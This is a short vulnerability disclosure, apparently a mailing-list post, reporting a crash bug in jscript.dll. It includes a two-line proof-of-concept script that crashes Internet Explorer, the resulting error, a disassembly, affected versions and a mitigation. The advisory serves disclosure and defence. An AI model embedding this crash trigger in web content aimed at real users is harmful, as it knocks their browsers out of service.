jscriptdll.txt

`hi,  
  
i found a bug in jscript.dll... here is a small report on it...  
  
--------  
Abstract  
--------  
  
Microsoft Corp.'s Windows Script Engine within the Windows operating  
system (OS) interprets and executes script code written in scripting  
languages such as VBscript and JScript. Such script code can be used to  
add functionality to web pages, or to automate tasks within the OS or a  
program. Script code can be written in several different scripting  
languages, such as Visual Basic Script, JScript or JavaScript.  
  
-----------  
Description  
-----------  
By passing malicious JavaScript via Internet Explorer (IE), Outlook or  
Outlook Express, remote attackers can crash Internet Explorer..   
The bug lies in the Windows Script Engine's implementation of  
JScript that is provided by jscript.dll (located in %SystemRoot%\system32).  
The following snippet of JavaScript code demonstrates the existence of the  
bug by crashing IE on a vulnerable Windows system:  
  
----------  
Exploit  
----------  
  
<script>  
this.window();  
</script>  
  
or....  
  
<script>  
self.window();  
</script>  
  
---------  
Notes  
---------  
  
IE crashes in Win2k... with the following error  
----------------------------------------------------  
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".  
The memory could not be "read".  
----------------------------------------------------  
  
Disassembly... of JScript.dll[5.6.08513]...  
6B73AA0A je 6B73AA25  
6B73AA0C mov eax,dword ptr [ebp-64h]  
6B73AA0F mov eax,dword ptr [eax+8]  
6B73AA12 mov ecx,dword ptr [eax]  
6B73AA14 push eax  
6B73AA15 call dword ptr [ecx+8] <--- illegal op  
6B73AA18 mov edx,dword ptr [ebp-4Ch]  
6B73AA1B push edx  
6B73AA1C call dword ptr ds:[6B773218h]  
6B73AA22 add esp,4  
6B73AA25 mov eax,dword ptr [ebp-34h]  
6B73AA28 jmp 6B7213CB  
6B73AA2D mov esi,dword ptr [ebp+18h]  
  
  
we find that the value in ecx [ie. value at memory location  
pointed by eax is corrupted...].  
  
  
Please Note:  
a few times the IE didn't cause an exception, instead it went sort of a hung state..  
the home/stop button or and any new url typed in the url box didn't work..  
  
---------------------------  
Possible Solution  
---------------------------  
Disable Active Scripting  
  
  
---------------  
Tested On  
---------------  
IE 5.01 (Win2000)  
IE 5.5 (Win98SE)  
IE 6.0 (WinXP)  
  
ie.  
JSCript.dll versions  
5.1.0.8513 (Win2000)  
5.5.0.8513 (Win98SE)  
5.6.0.6626 (WinXP Pro)  
5.6.0.8513 (WIn2000)  
  
  
----------  
Credits  
----------  
Real Name : Gregory R. Panakkal  
Handle : junkcode  
E-Mail : [email protected]  
WWW : www.evilcreations.net/junkcode/ (OR) www.crapware.tk  
  
rgds,  
junkcode  
  
`